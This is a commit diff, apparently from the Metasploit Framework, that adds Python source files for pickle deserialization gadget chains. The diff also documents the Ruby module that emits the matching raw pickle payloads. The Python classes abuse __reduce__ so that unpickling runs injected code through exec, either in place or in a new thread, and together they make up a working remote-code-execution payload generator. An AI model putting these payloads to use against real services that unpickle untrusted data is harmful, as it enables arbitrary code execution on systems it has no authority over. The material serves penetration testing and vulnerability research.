Add source code for Python deserialization gadgets

external/source/python_deserialization/py3_exec.py

@@ -0,0 +1,9 @@
+import pickle
+
+class GadgetChain:
+    def __reduce__(self):
+        return __builtins__.exec, ('#{escaped}',)
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(GadgetChain(), protocol=0)
+    print(repr(pickled.decode()))

external/source/python_deserialization/py3_exec_threaded.py

@@ -0,0 +1,14 @@
+import pickle
+import threading
+
+class CreateThread:
+    def __reduce__(self):
+        return threading.Thread, (None, __builtins__.exec, None, ('#{escaped}',))
+
+class GadgetChain:
+    def __reduce__(self):
+        return threading.Thread.start, (CreateThread(),)
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(GadgetChain(), protocol=0)
+    print(repr(pickled.decode()))

lib/msf/util/python_deserialization.rb

@@ -6,12 +6,14 @@ module Msf
     # Python deserialization class
     class PythonDeserialization
       # That could be in the future a list of payloads used to exploit the Python deserialization vulnerability.
+      # Payload source files are available in external/source/python_deserialization
       PAYLOADS = {
         # this payload will work with Python 3.x targets to execute Python code in place
         py3_exec: proc do |python_code|
           escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
           %|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
         end,
+        # this payload will work with Python 3.x targets to execute Python code in a new thread
         py3_exec_threaded: proc do |python_code|
           escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
           %|c__builtin__\ngetattr\np0\n(cthreading\nThread\np1\nVstart\np2\ntp3\nRp4\n(g1\n(Nc__builtin__\nexec\np5\nN(V#{escaped}\np6\ntp7\ntp8\nRp9\ntp10\nRp11\n.|